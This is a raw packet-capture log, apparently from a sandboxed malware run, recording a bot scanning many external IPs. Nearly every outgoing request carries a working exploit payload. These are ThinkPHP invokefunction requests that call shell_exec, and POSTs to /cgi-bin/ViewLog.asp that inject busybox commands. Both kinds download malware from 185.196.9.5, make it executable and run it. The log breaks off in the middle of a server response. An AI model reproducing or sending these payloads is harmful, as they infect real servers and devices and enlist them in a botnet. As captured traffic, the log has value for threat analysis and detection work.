Feb 25, 2024 19:04:40.925451040 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:41.149410009 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:04:40 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
918	192.168.2.15	44372	112.167.72.104	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:40.926507950 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
919	192.168.2.15	54844	112.220.69.203	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:40.939256907 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:41.242391109 CET	980	IN	HTTP/1.0 404 Not Found Server: SonicWALL Expires: -1 Cache-Control: no-cache Content-type: text/html;charset=UTF-8 X-Content-Type-Options: nosniff Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 73 70 61 6e 2e 75 72 6c 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 7d 70 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 73 70 61 6e 2e 73 65 72 76 65 72 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 72 6c 22 3e 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 3c 2f 73 70 61 6e 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 70 3e 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 3c 70 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 72 76 65 72 22 3e 53 6f 6e 69 63 57 61 6c 6c 20 53 65 72 76 65 72 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>File not found!</title><style type="text/css">.../--><![CDATA[/>.../ body { color: #000000; background-color: #FFFFFF; }span.url { text-decoration: underline; }p {margin-left: 3em;}span.server {font-size: smaller;}/...*/--></style></head><body><h1>File not found!</h1><p>The requested URL <span class="url">/index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget</span> was not found on this server.</p><p>If you entered the URL manually please check your spelling and try again.</p><h2>Error 404</h2><p><span class="server">SonicWall Server</span></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
920	192.168.2.15	45546	95.210.97.213	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:41.737394094 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
921	192.168.2.15	53924	94.187.110.103	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:41.764126062 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
922	192.168.2.15	58964	94.120.157.63	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:41.771603107 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
923	192.168.2.15	48760	31.136.15.237	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:41.918883085 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:42.469218016 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:43.589201927 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:45.797157049 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:50.405098915 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:59.365010023 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:17.285098076 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
924	192.168.2.15	39648	95.230.195.211	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:41.956113100 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:42.147866011 CET	1202	IN	HTTP/1.1 307 Temporary Redirect Date: Sun, 25 Feb 2024 18:04:42 GMT Content-Type: text/html Content-Length: 152 Connection: close Location: https://185.196.9.5:8080/cgi-bin/ViewLog.asp X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self' X-Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self' X-Webkit-CSP: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self' Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body bgcolor="white"><center><h1>307 Temporary Redirect</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
925	192.168.2.15	37666	85.240.105.149	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:41.956548929 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
926	192.168.2.15	48420	85.193.90.136	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:41.992321968 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:42.214942932 CET	300	IN	HTTP/1.1 404 Not Found Server: gunicorn Date: Sun, 25 Feb 2024 18:04:42 GMT Connection: close Content-Type: text/html; charset=utf-8 X-Frame-Options: DENY Content-Length: 179 X-Content-Type-Options: nosniff Referrer-Policy: same-origin Cross-Origin-Opener-Policy: same-origin

Session ID	Source IP	Source Port	Destination IP	Destination Port
927	192.168.2.15	50648	94.121.152.85	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:42.139410973 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
928	192.168.2.15	56024	94.121.24.250	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:42.140321970 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
929	192.168.2.15	52328	94.120.108.241	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:42.140357018 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
930	192.168.2.15	59788	95.210.97.22	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:43.412842035 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
931	192.168.2.15	53826	95.217.25.126	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:43.436090946 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:43.631831884 CET	339	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sun, 25 Feb 2024 18:04:43 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
932	192.168.2.15	52670	95.86.92.9	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:43.482048035 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
933	192.168.2.15	34600	112.220.90.2	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:44.013515949 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
934	192.168.2.15	34178	31.132.1.230	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:45.603136063 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:46.170486927 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:46.352523088 CET	1286	IN	HTTP/1.1 400 Bad Request Server: squid/3.5.20 Mime-Version: 1.0 Date: Sun, 25 Feb 2024 18:04:46 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3454 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 